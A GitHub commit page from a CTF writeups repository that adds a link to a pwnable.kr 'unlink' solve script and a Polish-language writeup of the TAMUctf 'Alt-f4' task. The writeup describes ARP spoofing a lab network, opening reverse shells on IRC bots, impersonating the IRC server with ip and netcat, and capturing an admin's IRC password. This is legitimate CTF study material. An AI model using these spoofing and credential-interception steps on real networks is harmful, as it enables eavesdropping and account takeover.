Skip to content

Commit 295e9a1

Browse files
committed
Merge branch 'master' of github.com:disconnect3d/writeups
* 'master' of github.com:disconnect3d/writeups: Add unlink from pwnable.kr
2 parents 1a08844 + db830a5 commit 295e9a1

File tree

2 files changed

+39
-0
lines changed

2 files changed

+39
-0
lines changed

README.md

+6
Original file line numberDiff line numberDiff line change
@@ -8,3 +8,9 @@
88
* [(PWN) babyformat - just a solving script *for a local libc*](isitdtu_ctf_quals_2018/babyformat/solve.py)
99
* [(PWN) xoxopwn - Python eval pwn](isitdtu_ctf_quals_2018/xoxopwn.md)
1010
* [(PWN) dead\_note\_lv1 - just a solving script, with explanations](isitdtu_ctf_quals_2018/dead_note_lv1/solve.py)
11+
12+
13+
## Wargamez
14+
15+
### pwnable.kr
16+
* [(PWN) unlink](pwnable.kr/unlink/solve.py)

tamuctf/altf4/solution.md

+33
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
# Alt-f4 task writeup [Polish]
2+
3+
**NOTE: This was written just for my friends and I didn't have time to polish it, so it is in polish language :P**
4+
5+
### TLDR task info
6+
TLDR:
7+
Nasz ip: 172.30.0.14 (w vpn)
8+
9+
Sa dwa routery:
10+
- 172.30.0.1 - tu my jestesmy podlaczeni oraz bot imp3ac33 czy jakos tak (172.30.0.2 chyba)
11+
- 172.30.20.1 - ten router jest podlaczony do 172.30.0.1 oraz ma w swojej sieci: serwer irca (172.30.20.10), admina irca - lordbaal (172.30.20.2), ktory w /whois widac ze siedzi na kanale #sanctum (gdzie jest flaga) oraz bota impac66 ktory ma ip 172.30.20.3
12+
13+
### Solution
14+
1. Robimyarp spoofing na 172.30.0.1 oraz 172.30.0.2 - bo tylko te hosty widac w naszej sieci (na przyklad przez ettercap)
15+
- dzieki temu wiemy ze istnieje serwer irca na 172.30.20.10, bo bot 172.30.0.2 sie z nim laczy
16+
- nie znamy hasla do irca, ale przez to ze robimy arp spoofing bot 172.30.0.2 rozlacza sie z irca i probuje polaczyc sie ponownie wysylajac haslo `underling`
17+
- na ircu widzimy komunikacje C&C: to znnaczy admin - lordbaal wysyla komendy do impac66 i imp3ac33 - w ten sposob: `+impac66, payload http://172.30.0.2:8000/stats` - i jednoczesnie ten lordbaal hostuje u siebie serwer http gdzie hostuje dla nich payloady
18+
- nie ma zadnych ACL/podpisow payloadow wiec mozemy zrobic reverse shella z obu botow na siebie
19+
- na botach nie ma nic ciekawego
20+
21+
2. Na botach mamy dostep do konfiguracji sieci przez polecenie `ip`
22+
23+
3. Robimy 2 reverse shelle na impac66 (172.30.20.2), dodajemy sobie adres ip irca do interfejsu sieciowego przez `ip addr add 172.30.20.10 dev eth0`; w drugim shellu odpalamy netcata `nc -l -vvv -p 6667` - chcemy "byc serwerem irca" i zrobic zeby baal sie z nami polaczyl
24+
25+
4. Na te chwile mamy taki sam adres ip jak serwer irca ale nikt w sieci o tym nie wie, a w szczegolnosci nie baal
26+
27+
5. impac66 rozlaczy sie wtedy sam z irca, bo wysyla wiadomosci sam do siebie - wznowi wtedy polaczenie do siebie do irca wiec w drugim shellu z nc zobaczymy to polaczenie, musimy je zabic z pierszego shella przez `kill -9 $(pidof nc)` i odpalic na nowo nc
28+
29+
6. Zeby baal laczyl sie do nas a nie do prawdziwego shella robimy arp spoofing poprzez ping: `ping -c 10 -I 172.30.20.10 172.30.20.2` - uwaga `-c 10` dajemy po to zeby wyslac 10 pakietow, a `-I 172.30.20.10` zeby ping wysylal pakiety ICMP z tego adresu ip (podszywamy sie pod serwer irca - zatruwamy tablice arp u baala)
30+
31+
7. jak dobrze trafimy (ewentualnie zabijajac nc jeszcze pare razy i odpalajac na nowo) to baal polaczy sie z nami i wysle nam swoje "uprzywilejowane" haslo irca
32+
33+
8. tutaj usuwamy z impac66 (172.30.20.2) dodatkowy adres ip (172.30.20.10) - przestajemy sie podszywac pod irca i od siebie wchodzimy na serwer irca z nowym haslem (od baala) i wbijamy na #sanctum i mamy flage

0 commit comments

Comments
 (0)